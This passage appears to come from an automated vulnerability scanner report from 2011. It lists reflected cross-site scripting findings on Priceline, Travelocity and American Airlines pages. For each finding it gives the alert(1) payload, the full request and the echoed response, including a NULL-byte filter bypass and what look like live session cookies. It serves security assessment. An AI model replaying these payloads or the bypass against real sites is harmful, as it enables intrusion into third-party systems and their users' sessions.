User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:19 GMT
Server: Microsoft-IIS/6.0
Content-Length: 57853
Content-Type: text/html
Set-Cookie: PSessKey=711510AC721510AC2011111313361896cd81295817; domain=.priceline.com; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights,
...[SNIP]...
<a href="?b3f4a"><script>alert(1)</script>618595210a8=1&dbg=CF0512DFBD78F3B23CF98DC16F6633E501215939E1B6F8064CD9B1BFFD3FF3EE937AD0360BF442B41D64A4AA414F8CA9B88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.11. http://tickets.priceline.com/privacypolicy/privacypolicy.asp [plf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /privacypolicy/privacypolicy.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008cd0a"><script>alert(1)</script>40d90879 was submitted in the plf parameter. This input was echoed as 8cd0a"><script>alert(1)</script>40d90879 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /privacypolicy/privacypolicy.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%008cd0a"><script>alert(1)</script>40d90879 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:26 GMT
Server: Microsoft-IIS/6.0
Content-Length: 54368
Content-Type: text/html
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights,
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%008cd0a"><script>alert(1)</script>40d90879&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.12. http://tickets.priceline.com/travel/airlines/lang/en-us/air_leavebehind.asp [lbp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /travel/airlines/lang/en-us/air_leavebehind.asp

Issue detail

The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c571'-alert(1)-'86b590b9f11 was submitted in the lbp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /travel/airlines/lang/en-us/air_leavebehind.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln&MainPage=details_ret&TimeOut=1800&lbp=v4a1c571'-alert(1)-'86b590b9f11 HTTP/1.1
Host: tickets.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=bf049cba906144f4ad9961ab6fcbc674; SETI=91F2A0C53F594DA86880E2D3EB88F0292201E89637CACE88AB5DCEFB93CA3736FA50EACEA2F76EB5B4369A79F77ECE2E4124198210D770BBB82C79331F433BA965B577A3DEBFA0A62201E89637CACE8850BB8D88F94F6CDC8B0027E8E1144B10DA6BD0C56050B6C30307BE62C3497A80; vid=v20111113132154397be127; vsch=v20111113132154397be127%5F17874400; Stick2=ID=0%7CB%7C11%2F13%2F2011+8%3A21; Referral=CLICKID=FDC%5FAIRSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=11%2F13%2F2011+8%3A21%3A54&ID=FARECAST; CJK=5164010a100011ac201111131322210e8010774369; JSessionKey=721510ac5064010a20111113132309dc6021609128; PSessKey=; WT_FPC=id=290adf770e0880aab941320965614204:lv=1321194346836:ss=1321194123541; __utma=137358961.2047494711.1320962016.1321051908.1321190524.3; __utmb=137358961.8.10.1321190524; __utmc=137358961; __utmz=137358961.1321190524.3.3.utmcsr=bing.com|utmccn=(referral)|utmcmd=referral|utmcct=/travel/; ysm_CK157FV45V2UHBGAV8MEGA5MKNTAG=ysm_PV157FV45V2UHBGAV8MEGA5MKNTAG:2&ysm_SN157FV45V2UHBGAV8MEGA5MKNTAG:1321190573730&ysm_LD157FV45V2UHBGAV8MEGA5MKNTAG:0; PLGBPOP=air_Core_B%3D111211

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:33:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 7675
Content-Type: text/html
Cache-control: private


<SCRIPT Language="JavaScript">
function vpXSellPopup(strURL, lWidth, lHeight, lXPos, lYPos, strParams, sWinName) {
   var x=(lWidth?lWidth:600);
   var y=(lHeight?lHeight:500);
   var xp = (lXPos?lX
...[SNIP]...
< 0) {
               this.window.location.href='http://tickets.priceline.com/travel/airlines/lang/en-us/air_leavebehind_v4a1c571'-alert(1)-'86b590b9f11.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pclnundefined';
           } else {    
               this.window.location.href='http://travelb.priceline.com/airlines/fareResultsLeaveBehind.do?session_key
...[SNIP]...

1.13. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /travel/airlines/lang/en-us/details_ret_bk.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26532"><script>alert(1)</script>b61b078c9ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel/airlines/lang/en-us/details_ret_bk.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln&26532"><script>alert(1)</script>b61b078c9ad=1 HTTP/1.1
Host: tickets.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tickets.priceline.com/travel/airlines/lang/en-us/confirm_status.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=bf049cba906144f4ad9961ab6fcbc674; SETI=91F2A0C53F594DA86880E2D3EB88F0292201E89637CACE88AB5DCEFB93CA3736FA50EACEA2F76EB5B4369A79F77ECE2E4124198210D770BBB82C79331F433BA965B577A3DEBFA0A62201E89637CACE8850BB8D88F94F6CDC8B0027E8E1144B10DA6BD0C56050B6C30307BE62C3497A80; vid=v20111113132154397be127; vsch=v20111113132154397be127%5F17874400; Stick2=ID=0%7CB%7C11%2F13%2F2011+8%3A21; Referral=CLICKID=FDC%5FAIRSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=11%2F13%2F2011+8%3A21%3A54&ID=FARECAST; CJK=5164010a100011ac201111131322210e8010774369; JSessionKey=721510ac5064010a20111113132309dc6021609128; PSessKey=; WT_FPC=id=290adf770e0880aab941320965614204:lv=1321194346836:ss=1321194123541; __utma=137358961.2047494711.1320962016.1321051908.1321190524.3; __utmb=137358961.8.10.1321190524; __utmc=137358961; __utmz=137358961.1321190524.3.3.utmcsr=bing.com|utmccn=(referral)|utmcmd=referral|utmcct=/travel/; ysm_CK157FV45V2UHBGAV8MEGA5MKNTAG=ysm_PV157FV45V2UHBGAV8MEGA5MKNTAG:2&ysm_SN157FV45V2UHBGAV8MEGA5MKNTAG:1321190573730&ysm_LD157FV45V2UHBGAV8MEGA5MKNTAG:0

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:34:01 GMT
Server: Microsoft-IIS/6.0
p3p: policyref="<http://www.priceline.com/w3c/p3p_exception_policy.xml>", CP="CAO DSP COR CURa ADMa DEVo TAIo PSAa PSDa OUR IND ONL NAV INT CNT STA PRE"
Content-Length: 80381
Content-Type: text/html
Cache-control: private


<SCRIPT Language="JavaScript">
function vpXSellPopup(strURL, lWidth, lHeight, lXPos, lYPos, strParams, sWinName) {
   var x=(lWidth?lWidth:600);
   var y=(lHeight?lHeight:500);
   var xp = (lXPos?lX
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln&26532"><script>alert(1)</script>b61b078c9ad=1&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.14. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /travel/airlines/lang/en-us/details_ret_bk.asp

Issue detail

The value of the path request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b144e"><script>alert(1)</script>154a7d15847 was submitted in the path parameter. This input was echoed as b144e"><script>alert(1)</script>154a7d15847 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /travel/airlines/lang/en-us/details_ret_bk.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln&path=bak%00b144e"><script>alert(1)</script>154a7d15847 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:28 GMT
Server: Microsoft-IIS/6.0
p3p: policyref="<http://www.priceline.com/w3c/p3p_exception_policy.xml>", CP="CAO DSP COR CURa ADMa DEVo TAIo PSAa PSDa OUR IND ONL NAV INT CNT STA PRE"
Content-Length: 80500
Content-Type: text/html
Cache-control: private


<SCRIPT Language="JavaScript">
function vpXSellPopup(strURL, lWidth, lHeight, lXPos, lYPos, strParams, sWinName) {
   var x=(lWidth?lWidth:600);
   var y=(lHeight?lHeight:500);
   var xp = (lXPos?lX
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln&path=bak%00b144e"><script>alert(1)</script>154a7d15847&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.15. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [plf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /travel/airlines/lang/en-us/details_ret_bk.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00784e1"><script>alert(1)</script>feea70b6100 was submitted in the plf parameter. This input was echoed as 784e1"><script>alert(1)</script>feea70b6100 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /travel/airlines/lang/en-us/details_ret_bk.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00784e1"><script>alert(1)</script>feea70b6100 HTTP/1.1
Host: tickets.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tickets.priceline.com/travel/airlines/lang/en-us/confirm_status.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=bf049cba906144f4ad9961ab6fcbc674; SETI=91F2A0C53F594DA86880E2D3EB88F0292201E89637CACE88AB5DCEFB93CA3736FA50EACEA2F76EB5B4369A79F77ECE2E4124198210D770BBB82C79331F433BA965B577A3DEBFA0A62201E89637CACE8850BB8D88F94F6CDC8B0027E8E1144B10DA6BD0C56050B6C30307BE62C3497A80; vid=v20111113132154397be127; vsch=v20111113132154397be127%5F17874400; Stick2=ID=0%7CB%7C11%2F13%2F2011+8%3A21; Referral=CLICKID=FDC%5FAIRSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=11%2F13%2F2011+8%3A21%3A54&ID=FARECAST; CJK=5164010a100011ac201111131322210e8010774369; JSessionKey=721510ac5064010a20111113132309dc6021609128; PSessKey=; WT_FPC=id=290adf770e0880aab941320965614204:lv=1321194346836:ss=1321194123541; __utma=137358961.2047494711.1320962016.1321051908.1321190524.3; __utmb=137358961.8.10.1321190524; __utmc=137358961; __utmz=137358961.1321190524.3.3.utmcsr=bing.com|utmccn=(referral)|utmcmd=referral|utmcct=/travel/; ysm_CK157FV45V2UHBGAV8MEGA5MKNTAG=ysm_PV157FV45V2UHBGAV8MEGA5MKNTAG:2&ysm_SN157FV45V2UHBGAV8MEGA5MKNTAG:1321190573730&ysm_LD157FV45V2UHBGAV8MEGA5MKNTAG:0

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:33:58 GMT
Server: Microsoft-IIS/6.0
p3p: policyref="<http://www.priceline.com/w3c/p3p_exception_policy.xml>", CP="CAO DSP COR CURa ADMa DEVo TAIo PSAa PSDa OUR IND ONL NAV INT CNT STA PRE"
Content-Length: 80381
Content-Type: text/html
Cache-control: private


<SCRIPT Language="JavaScript">
function vpXSellPopup(strURL, lWidth, lHeight, lXPos, lYPos, strParams, sWinName) {
   var x=(lWidth?lWidth:600);
   var y=(lHeight?lHeight:500);
   var xp = (lXPos?lX
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00784e1"><script>alert(1)</script>feea70b6100&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.16. http://travel.travelocity.com/trips/UpdateXFactorSelect.do [jsessionid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /trips/UpdateXFactorSelect.do

Issue detail

The value of the jsessionid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6e055%20a%3dbe6dbb680481 was submitted in the jsessionid parameter. This input was echoed as 6e055 a=be6dbb680481 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /trips/UpdateXFactorSelect.do;jsessionid=6BCDBF9222795F098DDE19F1029B74A0.p0618;jsessionid=6BCDBF9222795F098DDE19F1029B74A0.p0618?SEQ=1321191103978101320116e055%20a%3dbe6dbb680481 HTTP/1.1
Host: travel.travelocity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 13:36:43 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28451

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--
JSESSIONID = 6BCDBF9222795F098DDE19F1029B74A0.p0618
TPSESSIONID = T0042004706111113072154205152534750467
Service = TRAVELOCITY73D3F
...[SNIP]...
<input type="hidden" name="seq" value=1321191103978101320116e055 a=be6dbb680481>
...[SNIP]...

1.17. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [batchId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/call/plaincall/HomePageUtils.reportImpression.dwr

Issue detail

The value of the batchId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ec25'-alert(1)-'ed01382554e was submitted in the batchId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /dwr/call/plaincall/HomePageUtils.reportImpression.dwr HTTP/1.1
Host: www.aa.com
Connection: keep-alive
Content-Length: 537
Origin: https://www.aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: text/plain
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

callCount=1
page=/homePage.do
httpSessionId=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65
scriptSessionId=D02033EEA12EA28758FEDA1DF13E69E0549
c0-scriptName=HomePageUtils
c0-methodName=reportImpression
c0-id=0
...[SNIP]...
-param0=Object_Object:{flash:reference:c0-e1, reportedLocation:reference:c0-e2, reportedTarget:reference:c0-e3, reportedTitle:reference:c0-e4, locale:reference:c0-e5}
c0-param1=boolean:false
batchId=08ec25'-alert(1)-'ed01382554e

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 103
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:34:48 GMT
Connection: keep-alive

//#DWR-INSERT
//#DWR-REPLY
dwr.engine._remoteHandleCallback('08ec25'-alert(1)-'ed01382554e','0',null);

1.18. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [c0-id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/call/plaincall/HomePageUtils.reportImpression.dwr

Issue detail

The value of the c0-id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e68c9'-alert(1)-'753b553cd8c was submitted in the c0-id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /dwr/call/plaincall/HomePageUtils.reportImpression.dwr HTTP/1.1
Host: www.aa.com
Connection: keep-alive
Content-Length: 537
Origin: https://www.aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: text/plain
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

callCount=1
page=/homePage.do
httpSessionId=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65
scriptSessionId=D02033EEA12EA28758FEDA1DF13E69E0549
c0-scriptName=HomePageUtils
c0-methodName=reportImpression
c0-id=0e68c9'-alert(1)-'753b553cd8c
c0-e1=boolean:false
c0-e2=string:HomePageHero1
c0-e3=string:Europe1.Sale.xml
c0-e4=string:Europe%20Flight%20Deals
c0-e5=string:en_US
c0-param0=Object_Object:{flash:reference:c0-e1, reportedLocation:r
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 103
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:34:40 GMT
Connection: keep-alive

//#DWR-INSERT
//#DWR-REPLY
dwr.engine._remoteHandleCallback('0','0e68c9'-alert(1)-'753b553cd8c',null);

1.19. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [c0-scriptName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/call/plaincall/HomePageUtils.reportImpression.dwr

Issue detail

The value of the c0-scriptName request parameter is copied into the HTML document as plain text between tags. The payload b401d<script>alert(1)</script>23908e6d004 was submitted in the c0-scriptName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /dwr/call/plaincall/HomePageUtils.reportImpression.dwr HTTP/1.1
Host: www.aa.com
Connection: keep-alive
Content-Length: 537
Origin: https://www.aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: text/plain
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

callCount=1
page=/homePage.do
httpSessionId=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65
scriptSessionId=D02033EEA12EA28758FEDA1DF13E69E0549
c0-scriptName=HomePageUtilsb401d<script>alert(1)</script>23908e6d004
c0-methodName=reportImpression
c0-id=0
c0-e1=boolean:false
c0-e2=string:HomePageHero1
c0-e3=string:Europe1.Sale.xml
c0-e4=string:Europe%20Flight%20Deals
c0-e5=string:en_US
c0-param0=Object_Object:{fl
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 412
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:34:24 GMT
Connection: keep-alive

//#DWR-REPLY
if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: HomePageUtilsb401d<script>alert(1)</script>23908e6d004' }, '0');
else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: HomePageUtilsb401d<script>
...[SNIP]...

1.20. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [callCount parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/call/plaincall/HomePageUtils.reportImpression.dwr

Issue detail

The value of the callCount request parameter is copied into the HTML document as plain text between tags. The payload 36169<script>alert(1)</script>2d3ab3c1d40 was submitted in the callCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /dwr/call/plaincall/HomePageUtils.reportImpression.dwr HTTP/1.1
Host: www.aa.com
Connection: keep-alive
Content-Length: 537
Origin: https://www.aa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: text/plain
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

callCount=136169<script>alert(1)</script>2d3ab3c1d40
page=/homePage.do
httpSessionId=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65
scriptSessionId=D02033EEA12EA28758FEDA1DF13E69E0549
c0-scriptName=HomePageUtils
c0-methodName=reportImpression
c0-id=0
c0-e1=bool
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 460
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:34:20 GMT
Connection: keep-alive

//#DWR-REPLY
if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 136169<script>alert(1)</script>2d3ab3c1d40' });
else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 136169<
...[SNIP]...

1.21. https://www.aa.com/dwr/interface/CancelVPNRAjaxUtil.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/CancelVPNRAjaxUtil.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ef8da<script>alert(1)</script>4a04c56c4e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/CancelVPNRAjaxUtil.jsef8da<script>alert(1)</script>4a04c56c4e3 HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 78
Server: On-Demand Router/1.0
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:33:45 GMT
Connection: keep-alive
Vary: Accept-Encoding

No class by name: CancelVPNRAjaxUtilef8da<script>alert(1)</script>4a04c56c4e3

